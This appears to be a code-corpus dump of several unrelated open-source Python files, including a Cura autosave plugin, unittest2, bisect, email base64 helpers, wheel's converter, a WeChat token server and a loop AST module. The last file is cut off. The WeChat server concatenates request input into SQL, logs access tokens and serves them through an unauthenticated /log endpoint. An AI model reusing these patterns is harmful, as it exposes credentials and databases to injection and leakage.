# Copyright (c) 2016 Ultimaker B.V. # Cura is released under the terms of the AGPLv3 or higher. from PyQt5.QtCore import QTimer from UM.Extension import Extension from UM.Preferences import Preferences from UM.Application import Application from UM.Resources import Resources from UM.Logger import Logger class AutoSave(Extension): def __init__(self): super().__init__() Preferences.getInstance().preferenceChanged.connect(self._triggerTimer) self._global_stack = None Application.getInstance().globalContainerStackChanged.connect(self._onGlobalStackChanged) self._onGlobalStackChanged() Preferences.getInstance().addPreference("cura/autosave_delay", 1000 * 10) self._change_timer = QTimer() self._change_timer.setInterval(Preferences.getInstance().getValue("cura/autosave_delay")) self._change_timer.setSingleShot(True) self._change_timer.timeout.connect(self._onTimeout) self._saving = False def _triggerTimer(self, *args): if not self._saving: self._change_timer.start() def _onGlobalStackChanged(self): if self._global_stack: self._global_stack.propertyChanged.disconnect(self._triggerTimer) self._global_stack.containersChanged.disconnect(self._triggerTimer) self._global_stack = Application.getInstance().getGlobalContainerStack() if self._global_stack: self._global_stack.propertyChanged.connect(self._triggerTimer) self._global_stack.containersChanged.connect(self._triggerTimer) def _onTimeout(self): self._saving = True # To prevent the save process from triggering another autosave. Logger.log("d", "Autosaving preferences, instances and profiles") Application.getInstance().saveSettings() Preferences.getInstance().writeToFile(Resources.getStoragePath(Resources.Preferences, Application.getInstance().getApplicationName() + ".cfg")) self._saving = False
agpl-3.0
pec1985/titanium_mobile
drillbit/sdk_tests/unittest2/__init__.py
155
2406
""" unittest2 unittest2 is a backport of the new features added to the unittest testing framework in Python 2.7. It is tested to run on Python 2.4 - 2.6. To use unittest2 instead of unittest simply replace ``import unittest`` with ``import unittest2``. Copyright (c) 1999-2003 Steve Purcell Copyright (c) 2003-2010 Python Software Foundation This module is free software, and you may redistribute it and/or modify it under the same terms as Python itself, so long as this copyright message and disclaimer are retained in their original form. IN NO EVENT SHALL THE AUTHOR BE LIABLE TO ANY PARTY FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OF THIS CODE, EVEN IF THE AUTHOR HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. THE AUTHOR SPECIFICALLY DISCLAIMS ANY WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE CODE PROVIDED HEREUNDER IS ON AN "AS IS" BASIS, AND THERE IS NO OBLIGATION WHATSOEVER TO PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR MODIFICATIONS. 
""" __all__ = ['TestResult', 'TestCase', 'TestSuite', 'TextTestRunner', 'TestLoader', 'FunctionTestCase', 'main', 'defaultTestLoader', 'SkipTest', 'skip', 'skipIf', 'skipUnless', 'expectedFailure', 'TextTestResult', '__version__', 'collector'] __version__ = '0.5.1' # Expose obsolete functions for backwards compatibility __all__.extend(['getTestCaseNames', 'makeSuite', 'findTestCases']) from unittest2.collector import collector from unittest2.result import TestResult from unittest2.case import ( TestCase, FunctionTestCase, SkipTest, skip, skipIf, skipUnless, expectedFailure ) from unittest2.suite import BaseTestSuite, TestSuite from unittest2.loader import ( TestLoader, defaultTestLoader, makeSuite, getTestCaseNames, findTestCases ) from unittest2.main import TestProgram, main, main_ from unittest2.runner import TextTestRunner, TextTestResult try: from unittest2.signals import ( installHandler, registerResult, removeResult, removeHandler ) except ImportError: # Compatibility with platforms that don't have the signal module pass else: __all__.extend(['installHandler', 'registerResult', 'removeResult', 'removeHandler']) # deprecated _TextTestResult = TextTestResult __unittest = True
apache-2.0
linked67/p2pool-lire
p2pool/util/fixargparse.py
283
1630
from __future__ import absolute_import import argparse import sys class FixedArgumentParser(argparse.ArgumentParser): ''' fixes argparse's handling of empty string arguments and changes @filename behaviour to accept multiple arguments on each line ''' def _read_args_from_files(self, arg_strings): # expand arguments referencing files new_arg_strings = [] for arg_string in arg_strings: # for regular arguments, just add them back into the list if not arg_string or arg_string[0] not in self.fromfile_prefix_chars: new_arg_strings.append(arg_string) # replace arguments referencing files with the file content else: try: args_file = open(arg_string[1:]) try: arg_strings = [] for arg_line in args_file.read().splitlines(): for arg in self.convert_arg_line_to_args(arg_line): arg_strings.append(arg) arg_strings = self._read_args_from_files(arg_strings) new_arg_strings.extend(arg_strings) finally: args_file.close() except IOError: err = sys.exc_info()[1] self.error(str(err)) # return the modified argument list return new_arg_strings def convert_arg_line_to_args(self, arg_line): return [arg for arg in arg_line.split() if arg.strip()]
gpl-3.0
40223219/2015_midterm
static/Brython3.1.1-20150328-091302/Lib/bisect.py
1261
2595
"""Bisection algorithms.""" def insort_right(a, x, lo=0, hi=None): """Insert item x in list a, and keep it sorted assuming a is sorted. If x is already in a, insert it to the right of the rightmost x. Optional args lo (default 0) and hi (default len(a)) bound the slice of a to be searched. """ if lo < 0: raise ValueError('lo must be non-negative') if hi is None: hi = len(a) while lo < hi: mid = (lo+hi)//2 if x < a[mid]: hi = mid else: lo = mid+1 a.insert(lo, x) insort = insort_right # backward compatibility def bisect_right(a, x, lo=0, hi=None): """Return the index where to insert item x in list a, assuming a is sorted. The return value i is such that all e in a[:i] have e <= x, and all e in a[i:] have e > x. So if x already appears in the list, a.insert(x) will insert just after the rightmost x already there. Optional args lo (default 0) and hi (default len(a)) bound the slice of a to be searched. """ if lo < 0: raise ValueError('lo must be non-negative') if hi is None: hi = len(a) while lo < hi: mid = (lo+hi)//2 if x < a[mid]: hi = mid else: lo = mid+1 return lo bisect = bisect_right # backward compatibility def insort_left(a, x, lo=0, hi=None): """Insert item x in list a, and keep it sorted assuming a is sorted. If x is already in a, insert it to the left of the leftmost x. Optional args lo (default 0) and hi (default len(a)) bound the slice of a to be searched. """ if lo < 0: raise ValueError('lo must be non-negative') if hi is None: hi = len(a) while lo < hi: mid = (lo+hi)//2 if a[mid] < x: lo = mid+1 else: hi = mid a.insert(lo, x) def bisect_left(a, x, lo=0, hi=None): """Return the index where to insert item x in list a, assuming a is sorted. The return value i is such that all e in a[:i] have e < x, and all e in a[i:] have e >= x. So if x already appears in the list, a.insert(x) will insert just before the leftmost x already there. Optional args lo (default 0) and hi (default len(a)) bound the slice of a to be searched. 
""" if lo < 0: raise ValueError('lo must be non-negative') if hi is None: hi = len(a) while lo < hi: mid = (lo+hi)//2 if a[mid] < x: lo = mid+1 else: hi = mid return lo # Overwrite above definitions with a fast C implementation try: from _bisect import * except ImportError: pass
gpl-3.0
alphafoobar/intellij-community
python/lib/Lib/email/base64MIME.py
93
5802
# Copyright (C) 2002-2006 Python Software Foundation # Author: Ben Gertzfield # Contact: email-sig@python.org """Base64 content transfer encoding per RFCs 2045-2047. This module handles the content transfer encoding method defined in RFC 2045 to encode arbitrary 8-bit data using the three 8-bit bytes in four 7-bit characters encoding known as Base64. It is used in the MIME standards for email to attach images, audio, and text using some 8-bit character sets to messages. This module provides an interface to encode and decode both headers and bodies with Base64 encoding. RFC 2045 defines a method for including character set information in an `encoded-word' in a header. This method is commonly used for 8-bit real names in To:, From:, Cc:, etc. fields, as well as Subject: lines. This module does not do the line wrapping or end-of-line character conversion necessary for proper internationalized headers; it only does dumb encoding and decoding. To deal with the various line wrapping issues, use the email.Header module. """ __all__ = [ 'base64_len', 'body_decode', 'body_encode', 'decode', 'decodestring', 'encode', 'encodestring', 'header_encode', ] import re from binascii import b2a_base64, a2b_base64 from email.utils import fix_eols CRLF = '\r\n' NL = '\n' EMPTYSTRING = '' # See also Charset.py MISC_LEN = 7 # Helpers def base64_len(s): """Return the length of s when it is encoded with base64.""" groups_of_3, leftover = divmod(len(s), 3) # 4 bytes out for each 3 bytes (or nonzero fraction thereof) in. # Thanks, Tim! n = groups_of_3 * 4 if leftover: n += 4 return n def header_encode(header, charset='iso-8859-1', keep_eols=False, maxlinelen=76, eol=NL): """Encode a single header line with Base64 encoding in a given charset. Defined in RFC 2045, this Base64 encoding is identical to normal Base64 encoding, except that each line must be intelligently wrapped (respecting the Base64 encoding), and subsequent lines must start with a space. 
charset names the character set to use to encode the header. It defaults to iso-8859-1. End-of-line characters (\\r, \\n, \\r\\n) will be automatically converted to the canonical email line separator \\r\\n unless the keep_eols parameter is True (the default is False). Each line of the header will be terminated in the value of eol, which defaults to "\\n". Set this to "\\r\\n" if you are using the result of this function directly in email. The resulting string will be in the form: "=?charset?b?WW/5ciBtYXp66XLrIHf8eiBhIGhhbXBzdGHuciBBIFlv+XIgbWF6euly?=\\n =?charset?b?6yB3/HogYSBoYW1wc3Rh7nIgQkMgWW/5ciBtYXp66XLrIHf8eiBhIGhh?=" with each line wrapped at, at most, maxlinelen characters (defaults to 76 characters). """ # Return empty headers unchanged if not header: return header if not keep_eols: header = fix_eols(header) # Base64 encode each line, in encoded chunks no greater than maxlinelen in # length, after the RFC chrome is added in. base64ed = [] max_encoded = maxlinelen - len(charset) - MISC_LEN max_unencoded = max_encoded * 3 // 4 for i in range(0, len(header), max_unencoded): base64ed.append(b2a_base64(header[i:i+max_unencoded])) # Now add the RFC chrome to each encoded chunk lines = [] for line in base64ed: # Ignore the last character of each line if it is a newline if line.endswith(NL): line = line[:-1] # Add the chrome lines.append('=?%s?b?%s?=' % (charset, line)) # Glue the lines together and return it. BAW: should we be able to # specify the leading whitespace in the joiner? joiner = eol + ' ' return joiner.join(lines) def encode(s, binary=True, maxlinelen=76, eol=NL): """Encode a string with base64. Each line will be wrapped at, at most, maxlinelen characters (defaults to 76 characters). If binary is False, end-of-line characters will be converted to the canonical email end-of-line sequence \\r\\n. Otherwise they will be left verbatim (this is the default). Each line of encoded text will end with eol, which defaults to "\\n". 
Set this to "\r\n" if you will be using the result of this function directly in an email. """ if not s: return s if not binary: s = fix_eols(s) encvec = [] max_unencoded = maxlinelen * 3 // 4 for i in range(0, len(s), max_unencoded): # BAW: should encode() inherit b2a_base64()'s dubious behavior in # adding a newline to the encoded string? enc = b2a_base64(s[i:i + max_unencoded]) if enc.endswith(NL) and eol <> NL: enc = enc[:-1] + eol encvec.append(enc) return EMPTYSTRING.join(encvec) # For convenience and backwards compatibility w/ standard base64 module body_encode = encode encodestring = encode def decode(s, convert_eols=None): """Decode a raw base64 string. If convert_eols is set to a string value, all canonical email linefeeds, e.g. "\\r\\n", in the decoded text will be converted to the value of convert_eols. os.linesep is a good choice for convert_eols if you are decoding a text attachment. This function does not parse a full MIME header value encoded with base64 (like =?iso-8895-1?b?bmloISBuaWgh?=) -- please use the high level email.Header class for that functionality. """ if not s: return s dec = a2b_base64(s) if convert_eols: return dec.replace(CRLF, convert_eols) return dec # For convenience and backwards compatibility w/ standard base64 module body_decode = decode decodestring = decode
apache-2.0
mdworks2016/work_development
Python/20_Third_Certification/venv/lib/python3.7/site-packages/wheel/cli/convert.py
10
9498
import os.path import re import shutil import sys import tempfile import zipfile from distutils import dist from glob import iglob from ..bdist_wheel import bdist_wheel from ..wheelfile import WheelFile from . import WheelError, require_pkgresources egg_info_re = re.compile(r''' (?P<name>.+?)-(?P<ver>.+?) (-(?P<pyver>py\d\.\d+) (-(?P<arch>.+?))? )?.egg$''', re.VERBOSE) class _bdist_wheel_tag(bdist_wheel): # allow the client to override the default generated wheel tag # The default bdist_wheel implementation uses python and abi tags # of the running python process. This is not suitable for # generating/repackaging prebuild binaries. full_tag_supplied = False full_tag = None # None or a (pytag, soabitag, plattag) triple def get_tag(self): if self.full_tag_supplied and self.full_tag is not None: return self.full_tag else: return bdist_wheel.get_tag(self) def egg2wheel(egg_path, dest_dir): filename = os.path.basename(egg_path) match = egg_info_re.match(filename) if not match: raise WheelError('Invalid egg file name: {}'.format(filename)) egg_info = match.groupdict() dir = tempfile.mkdtemp(suffix="_e2w") if os.path.isfile(egg_path): # assume we have a bdist_egg otherwise with zipfile.ZipFile(egg_path) as egg: egg.extractall(dir) else: # support buildout-style installed eggs directories for pth in os.listdir(egg_path): src = os.path.join(egg_path, pth) if os.path.isfile(src): shutil.copy2(src, dir) else: shutil.copytree(src, os.path.join(dir, pth)) pyver = egg_info['pyver'] if pyver: pyver = egg_info['pyver'] = pyver.replace('.', '') arch = (egg_info['arch'] or 'any').replace('.', '_').replace('-', '_') # assume all binary eggs are for CPython abi = 'cp' + pyver[2:] if arch != 'any' else 'none' root_is_purelib = egg_info['arch'] is None if root_is_purelib: bw = bdist_wheel(dist.Distribution()) else: bw = _bdist_wheel_tag(dist.Distribution()) bw.root_is_pure = root_is_purelib bw.python_tag = pyver bw.plat_name_supplied = True bw.plat_name = egg_info['arch'] or 'any' if 
not root_is_purelib: bw.full_tag_supplied = True bw.full_tag = (pyver, abi, arch) dist_info_dir = os.path.join(dir, '{name}-{ver}.dist-info'.format(**egg_info)) bw.egg2dist(os.path.join(dir, 'EGG-INFO'), dist_info_dir) bw.write_wheelfile(dist_info_dir, generator='egg2wheel') wheel_name = '{name}-{ver}-{pyver}-{}-{}.whl'.format(abi, arch, **egg_info) with WheelFile(os.path.join(dest_dir, wheel_name), 'w') as wf: wf.write_files(dir) shutil.rmtree(dir) def parse_wininst_info(wininfo_name, egginfo_name): """Extract metadata from filenames. Extracts the 4 metadataitems needed (name, version, pyversion, arch) from the installer filename and the name of the egg-info directory embedded in the zipfile (if any). The egginfo filename has the format:: name-ver(-pyver)(-arch).egg-info The installer filename has the format:: name-ver.arch(-pyver).exe Some things to note: 1. The installer filename is not definitive. An installer can be renamed and work perfectly well as an installer. So more reliable data should be used whenever possible. 2. The egg-info data should be preferred for the name and version, because these come straight from the distutils metadata, and are mandatory. 3. The pyver from the egg-info data should be ignored, as it is constructed from the version of Python used to build the installer, which is irrelevant - the installer filename is correct here (even to the point that when it's not there, any version is implied). 4. The architecture must be taken from the installer filename, as it is not included in the egg-info data. 5. Architecture-neutral installers still have an architecture because the installer format itself (being executable) is architecture-specific. We should therefore ignore the architecture if the content is pure-python. """ egginfo = None if egginfo_name: egginfo = egg_info_re.search(egginfo_name) if not egginfo: raise ValueError("Egg info filename %s is not valid" % (egginfo_name,)) # Parse the wininst filename # 1. 
Distribution name (up to the first '-') w_name, sep, rest = wininfo_name.partition('-') if not sep: raise ValueError("Installer filename %s is not valid" % (wininfo_name,)) # Strip '.exe' rest = rest[:-4] # 2. Python version (from the last '-', must start with 'py') rest2, sep, w_pyver = rest.rpartition('-') if sep and w_pyver.startswith('py'): rest = rest2 w_pyver = w_pyver.replace('.', '') else: # Not version specific - use py2.py3. While it is possible that # pure-Python code is not compatible with both Python 2 and 3, there # is no way of knowing from the wininst format, so we assume the best # here (the user can always manually rename the wheel to be more # restrictive if needed). w_pyver = 'py2.py3' # 3. Version and architecture w_ver, sep, w_arch = rest.rpartition('.') if not sep: raise ValueError("Installer filename %s is not valid" % (wininfo_name,)) if egginfo: w_name = egginfo.group('name') w_ver = egginfo.group('ver') return {'name': w_name, 'ver': w_ver, 'arch': w_arch, 'pyver': w_pyver} def wininst2wheel(path, dest_dir): with zipfile.ZipFile(path) as bdw: # Search for egg-info in the archive egginfo_name = None for filename in bdw.namelist(): if '.egg-info' in filename: egginfo_name = filename break info = parse_wininst_info(os.path.basename(path), egginfo_name) root_is_purelib = True for zipinfo in bdw.infolist(): if zipinfo.filename.startswith('PLATLIB'): root_is_purelib = False break if root_is_purelib: paths = {'purelib': ''} else: paths = {'platlib': ''} dist_info = "%(name)s-%(ver)s" % info datadir = "%s.data/" % dist_info # rewrite paths to trick ZipFile into extracting an egg # XXX grab wininst .ini - between .exe, padding, and first zip file. 
members = [] egginfo_name = '' for zipinfo in bdw.infolist(): key, basename = zipinfo.filename.split('/', 1) key = key.lower() basepath = paths.get(key, None) if basepath is None: basepath = datadir + key.lower() + '/' oldname = zipinfo.filename newname = basepath + basename zipinfo.filename = newname del bdw.NameToInfo[oldname] bdw.NameToInfo[newname] = zipinfo # Collect member names, but omit '' (from an entry like "PLATLIB/" if newname: members.append(newname) # Remember egg-info name for the egg2dist call below if not egginfo_name: if newname.endswith('.egg-info'): egginfo_name = newname elif '.egg-info/' in newname: egginfo_name, sep, _ = newname.rpartition('/') dir = tempfile.mkdtemp(suffix="_b2w") bdw.extractall(dir, members) # egg2wheel abi = 'none' pyver = info['pyver'] arch = (info['arch'] or 'any').replace('.', '_').replace('-', '_') # Wininst installers always have arch even if they are not # architecture-specific (because the format itself is). # So, assume the content is architecture-neutral if root is purelib. if root_is_purelib: arch = 'any' # If the installer is architecture-specific, it's almost certainly also # CPython-specific. 
if arch != 'any': pyver = pyver.replace('py', 'cp') wheel_name = '-'.join((dist_info, pyver, abi, arch)) if root_is_purelib: bw = bdist_wheel(dist.Distribution()) else: bw = _bdist_wheel_tag(dist.Distribution()) bw.root_is_pure = root_is_purelib bw.python_tag = pyver bw.plat_name_supplied = True bw.plat_name = info['arch'] or 'any' if not root_is_purelib: bw.full_tag_supplied = True bw.full_tag = (pyver, abi, arch) dist_info_dir = os.path.join(dir, '%s.dist-info' % dist_info) bw.egg2dist(os.path.join(dir, egginfo_name), dist_info_dir) bw.write_wheelfile(dist_info_dir, generator='wininst2wheel') wheel_path = os.path.join(dest_dir, wheel_name) with WheelFile(wheel_path, 'w') as wf: wf.write_files(dir) shutil.rmtree(dir) def convert(files, dest_dir, verbose): # Only support wheel convert if pkg_resources is present require_pkgresources('wheel convert') for pat in files: for installer in iglob(pat): if os.path.splitext(installer)[1] == '.egg': conv = egg2wheel else: conv = wininst2wheel if verbose: print("{}... ".format(installer)) sys.stdout.flush() conv(installer, dest_dir) if verbose: print("OK")
apache-2.0
William-An/wechat_server
Control_server/accesskey_Server.py
1
5638
import requests import sqlite3 import web import time import os import sys # 加密?-> 出租服务器 """ Using two server to provide wechat subscription service, one for acquring token, one for processing request """ PATH = os.path.abspath(os.path.dirname(sys.argv[0])) # The path of this file timer=os.times() web.config.debug = False # Set true to open debug output accesskey_url = "https://api.weixin.qq.com/cgi-bin/token" urls=( "/access_token", "token_acquirer", "/log", "log_replyier" ) database = sqlite3.connect(PATH+r"\..\Static\appid.db") # Initializing database #database_dir = PATH+r"\..\Static\appid.db" #database = web.database(dbn="sqlite",db=database_dir) # Create table to store tokens try: database.execute('''CREATE TABLE appid_token(appid text, current_token text, last_time real)''') except: del database class token_acquirer: db=None def __init__(self): """ Log server's initialization Store debug log """ # Initialize database # Class attribute? token_acquirer.db = web.database(dbn="sqlite",db=PATH+r"\..\Static\appid.db") self.last_time = 0 msg = time.strftime("%Y-%m-%d %H:%M:%S")+"\tProcessing request..." print(msg) with open(PATH+r"\..\Static\log","a") as log: log.writelines(msg) log.write("\n") log.flush() log.close() def GET(self): # What about multi reuse??? 多个服务器请求时怎么办 -> SQL # print(web.ctx.ip) credential = dict(web.input()) # print(credential["appid"]) # Get elapse time to calculate expire_time -> time.time() store last record in sql, calculate with this request # SELECT expire_time FROM appid_token WHERE appid = try: # Using db.query to process regular sql code self.last_time = token_acquirer.db.query("SELECT last_time FROM appid_token WHERE appid = $appid",vars= {"appid":credential["appid"]})["last_time"] # print(self.last_time) except: # New appid? 
# INSERT INTO appid_token VALUES(appid, current_token, last_time) token_acquirer.db.query("INSERT INTO appid_token VALUES($appid,$current_token,$last_time)",vars={"appid":credential["appid"],"current_token":"", "last_time":self.last_time}) # print(token_acquirer.db.select('appid_token')[0]) # Simplify this if clause? if time.time() - self.last_time > 7180: # If access_token is nearly invalid self.token = self.get_token(credential) print(self.token) if "ERROR" in self.token: return self.token # Update token and time # UPDATE appid_token SET current_token = , expire_time = WHERE appid = # print(token_acquirer.db.select('appid_token')[0]) token_acquirer.db.query("UPDATE appid_token SET current_token =$current_token , last_time= $last_time WHERE appid = $appid",vars={"appid":credential["appid"],"current_token":self.token, "last_time":time.time()}) # print(token_acquirer.db.select('appid_token')[0]) return self.token else: # find token in sql return token_acquirer.db.select('appid_token',id,what="current_token",where="appid = "+credential["appid"])["current_token"] def get_token(self,credential): with open(PATH+r"\..\Static\log","a") as log: for i in range(5): # Try 5 times try: key = requests.get(accesskey_url,params=credential).json() except Exception as err: # Change to use string format: "%",var msg = time.strftime("%Y-%m-%d %H:%M:%S")+"\t[-] ID:"+credential["appid"]+"\tError in get:"+str(err)#+"\t Usually inapporpriate GET input" # Write a function? log.writelines(msg+"\n") log.flush() print(msg) #time.sleep(1) continue if "errcode" in key: msg = time.strftime("%Y-%m-%d %H:%M:%S")+"\t[-] ID:"+credential["appid"]+"\tUnable to acquire access_token:"+str(key["errcode"])+"\t"+key["errmsg"] log.writelines(msg+"\n") log.flush() print(msg) #time.sleep(1) continue # Send email? 
msg = time.strftime("%Y-%m-%d %H:%M:%S")+"\t[+] ID:"+credential["appid"]+"\ttoken:"+str(key["access_token"]) log.writelines(msg+"\n") log.flush() # Save output print(msg) log.close() return key["access_token"]#, key["expires_in"] else: print(msg) log.close() return "ERROR:"+msg#,0 # Read the last 5 lines and print class log_replyier(): # Adding authentication? APP secret? log_dir = PATH+r"\..\Static\log" #def __init__(self): def GET(self): try: request_appid = dict(web.input())["appid"] return log_replyier.log_finder(request_appid) # Have to use position vars? except Exception as err: return str(err) @staticmethod def log_finder(appid): with open(log_replyier.log_dir,"r") as log_file: msg = "".join([i for i in log_file.readlines() if appid in i ]) print(msg) return msg if __name__ == "__main__": app = web.application(urls,globals()) app.run()
apache-2.0
tajkhan/pluto-pocc
annotations/module/loop/ast.py
4
20819
# # The classes of the abstract syntax tree # # AST # | # +-- Exp # | | # | +-- NumLitExp # | +-- StringLitExp # | +-- IdentExp # | +-- ArrayRefExp # | +-- FunCallExp # | +-- UnaryExp # | +-- BinOpExp # | +-- ParenthExp # | # +-- Stmt # | | # | +-- ExpStmt # | +-- CompStmt # | +-- IfStmt # | +-- ForStmt # | +-- TransformStmt # | # +-- NewAST # | # +-- VarDecl # # - The NewAST is used to denote ASTs that are used only in the output code generation. # - UnaryExp.AND never appears in the input code. It is used in the output code generation only. # import sys #----------------------------------------------- # AST - the base class #----------------------------------------------- class AST: def __init__(self, line_no = ''): '''Create an abstract syntax tree node''' self.line_no = line_no # may be null def replicate(self): '''Replicate this abstract syntax tree node''' raise NotImplementedError('%s: abstract function "replicate" not implemented' % self.__class__.__name__) def __repr__(self): '''Return a string representation of this abstract syntax tree node''' raise NotImplementedError('%s: abstract function "__repr__" not implemented' % self.__class__.__name__) def __str__(self): '''Return a string representation of this abstract syntax tree node''' return repr(self) def unparseToC(self, indent, extra_indent): '''Generate C/C++ code from this abstract syntax tree node''' raise NotImplementedError('%s: abstract function "unparseToC" not implemented' % self.__class__.__name__) def unparseToFortran(self, indent, extra_indent): '''Generate Fortran code from this abstract syntax tree node''' raise NotImplementedError('%s: abstract function "unparseToFortran" not implemented' % self.__class__.__name__) #----------------------------------------------- # Expression #----------------------------------------------- class Exp(AST): def __init__(self, line_no = ''): '''Create an expression''' AST.__init__(self, line_no) #----------------------------------------------- # Number 
Literal #----------------------------------------------- class NumLitExp(Exp): INT = 1 FLOAT = 2 def __init__(self, val, lit_type, line_no = ''): '''Create a numeric literal''' Exp.__init__(self, line_no) self.val = val self.lit_type = lit_type def replicate(self): '''Replicate this abstract syntax tree node''' return NumLitExp(self.val, self.lit_type, self.line_no) def __repr__(self): '''Return a string representation of this abstract syntax tree node''' return str(self.val) def unparseToC(self, indent, extra_indent): '''Generate C/C++ code from this abstract syntax tree node''' return str(self.val) #----------------------------------------------- # String Literal #----------------------------------------------- class StringLitExp(Exp): def __init__(self, val, line_no = ''): '''Create a string literal''' Exp.__init__(self, line_no) self.val = val def replicate(self): '''Replicate this abstract syntax tree node''' return StringLitExp(self.val, self.line_no) def __repr__(self): '''Return a string representation of this abstract syntax tree node''' return str(self.val) def unparseToC(self, indent, extra_indent): '''Generate C/C++ code from this abstract syntax tree node''' return str(self.val) #----------------------------------------------- # Identifier #----------------------------------------------- class IdentExp(Exp): def __init__(self, name, line_no = ''): '''Create an identifier''' Exp.__init__(self, line_no) self.name = name def replicate(self): '''Replicate this abstract syntax tree node''' return IdentExp(self.name, self.line_no) def __repr__(self): '''Return a string representation of this abstract syntax tree node''' return str(self.name) def unparseToC(self, indent, extra_indent): '''Generate C/C++ code from this abstract syntax tree node''' return str(self.name) #----------------------------------------------- # Array Reference #----------------------------------------------- class ArrayRefExp(Exp): def __init__(self, exp, sub_exp, line_no = ''): 
'''Create an array reference''' Exp.__init__(self, line_no) self.exp = exp self.sub_exp = sub_exp def replicate(self): '''Replicate this abstract syntax tree node''' return ArrayRefExp(self.exp.replicate(), self.sub_exp.replicate(), self.line_no) def __repr__(self): '''Return a string representation of this abstract syntax tree node''' return str(self.exp) + '[' + str(self.sub_exp) + ']' def unparseToC(self, indent, extra_indent): '''Generate C/C++ code from this abstract syntax tree node''' s = '' s += self.exp.unparseToC(indent, extra_indent) + '[' s += self.sub_exp.unparseToC(indent, extra_indent) + ']' return s #----------------------------------------------- # Function Call #----------------------------------------------- class FunCallExp(Exp): def __init__(self, exp, args, line_no = ''): '''Create a function call''' Exp.__init__(self, line_no) self.exp = exp self.args = args def replicate(self): '''Replicate this abstract syntax tree node''' return FunCallExp(self.exp.replicate(), [a.replicate() for a in self.args], self.line_no) def __repr__(self): '''Return a string representation of this abstract syntax tree node''' s = str(self.exp) + '(' s += ', '.join(map(str, self.args)) s += ')' return s def unparseToC(self, indent, extra_indent): '''Generate C/C++ code from this abstract syntax tree node''' s = self.exp.unparseToC(indent, extra_indent) + '(' s += ', '.join(map(lambda x: x.unparseToC(indent, extra_indent), self.args)) s += ')' return s #----------------------------------------------- # Unary Expression #----------------------------------------------- class UnaryExp(Exp): PLUS = 1 MINUS = 2 LNOT = 3 PRE_INC = 4 PRE_DEC = 5 POST_INC = 6 POST_DEC = 7 AND = 8 def __init__(self, exp, op_type, line_no = ''): '''Create a unary operation expression''' Exp.__init__(self, line_no) self.exp = exp self.op_type = op_type def replicate(self): '''Replicate this abstract syntax tree node''' return UnaryExp(self.exp.replicate(), self.op_type, self.line_no) def 
__repr__(self): '''Return a string representation of this abstract syntax tree node''' s = str(self.exp) if self.op_type == UnaryExp.PLUS: s = '+' + s elif self.op_type == UnaryExp.MINUS: s = '-' + s elif self.op_type == UnaryExp.LNOT: s = '!' + s elif self.op_type == UnaryExp.PRE_INC: s = '++' + s elif self.op_type == UnaryExp.PRE_DEC: s = '--' + s elif self.op_type == UnaryExp.POST_INC: s = s + '++' elif self.op_type == UnaryExp.POST_DEC: s = s + '--' elif self.op_type == UnaryExp.AND: s = '&' + s else: print 'internal error: unknown unary operator type' sys.exit(1) return s def unparseToC(self, indent, extra_indent): '''Generate C/C++ code from this abstract syntax tree node''' s = self.exp.unparseToC(indent, extra_indent) if self.op_type == UnaryExp.PLUS: s = '+' + s elif self.op_type == UnaryExp.MINUS: s = '-' + s elif self.op_type == UnaryExp.LNOT: s = '!' + s elif self.op_type == UnaryExp.PRE_INC: s = '++' + s elif self.op_type == UnaryExp.PRE_DEC: s = '--' + s elif self.op_type == UnaryExp.POST_INC: s = s + '++' elif self.op_type == UnaryExp.POST_DEC: s = s + '--' elif self.op_type == UnaryExp.AND: s = '&' + s else: print 'internal error: unknown unary operator type' sys.exit(1) return s #----------------------------------------------- # Binary Operation #----------------------------------------------- class BinOpExp(Exp): MUL = 1 DIV = 2 MOD = 3 ADD = 4 SUB = 5 LT = 6 GT = 7 LE = 8 GE = 9 EQ = 10 NE = 11 LOR = 12 LAND = 13 COMMA = 14 EQ_ASGN = 15 def __init__(self, lhs, rhs, op_type, line_no = ''): '''Create a binary operation expression''' Exp.__init__(self, line_no) self.lhs = lhs self.rhs = rhs self.op_type = op_type def replicate(self): '''Replicate this abstract syntax tree node''' return BinOpExp(self.lhs.replicate(), self.rhs.replicate(), self.op_type, self.line_no) def __repr__(self): '''Return a string representation of this abstract syntax tree node''' s = str(self.lhs) if (self.op_type == BinOpExp.MUL): s += ' * ' elif (self.op_type == 
BinOpExp.DIV): s += ' / ' elif (self.op_type == BinOpExp.MOD): s += ' % ' elif (self.op_type == BinOpExp.ADD): s += ' + ' elif (self.op_type == BinOpExp.SUB): s += ' - ' elif (self.op_type == BinOpExp.LT): s += ' < ' elif (self.op_type == BinOpExp.GT): s += ' > ' elif (self.op_type == BinOpExp.LE): s += ' <= ' elif (self.op_type == BinOpExp.GE): s += ' >= ' elif (self.op_type == BinOpExp.EQ): s += ' == ' elif (self.op_type == BinOpExp.NE): s += ' != ' elif (self.op_type == BinOpExp.LOR): s += ' || ' elif (self.op_type == BinOpExp.LAND): s += ' && ' elif (self.op_type == BinOpExp.COMMA): s += ' , ' elif (self.op_type == BinOpExp.EQ_ASGN): s += ' = ' else: print 'internal error: unknown bin-op operator type' sys.exit(1) s += str(self.rhs) return s def unparseToC(self, indent, extra_indent): '''Generate C/C++ code from this abstract syntax tree node''' s = self.lhs.unparseToC(indent, extra_indent) if (self.op_type == BinOpExp.MUL): s += ' * ' elif (self.op_type == BinOpExp.DIV): s += ' / ' elif (self.op_type == BinOpExp.MOD): s += ' % ' elif (self.op_type == BinOpExp.ADD): s += ' + ' elif (self.op_type == BinOpExp.SUB): s += ' - ' elif (self.op_type == BinOpExp.LT): s += ' < ' elif (self.op_type == BinOpExp.GT): s += ' > ' elif (self.op_type == BinOpExp.LE): s += ' <= ' elif (self.op_type == BinOpExp.GE): s += ' >= ' elif (self.op_type == BinOpExp.EQ): s += ' == ' elif (self.op_type == BinOpExp.NE): s += ' != ' elif (self.op_type == BinOpExp.LOR): s += ' || ' elif (self.op_type == BinOpExp.LAND): s += ' && ' elif (self.op_type == BinOpExp.COMMA): s += ' , ' elif (self.op_type == BinOpExp.EQ_ASGN): s += ' = ' else: print 'internal error: unknown bin-op operator type' sys.exit(1) s += self.rhs.unparseToC(indent, extra_indent) return s #----------------------------------------------- # Parenthesized Expression #----------------------------------------------- class ParenthExp(Exp): def __init__(self, exp, line_no = ''): 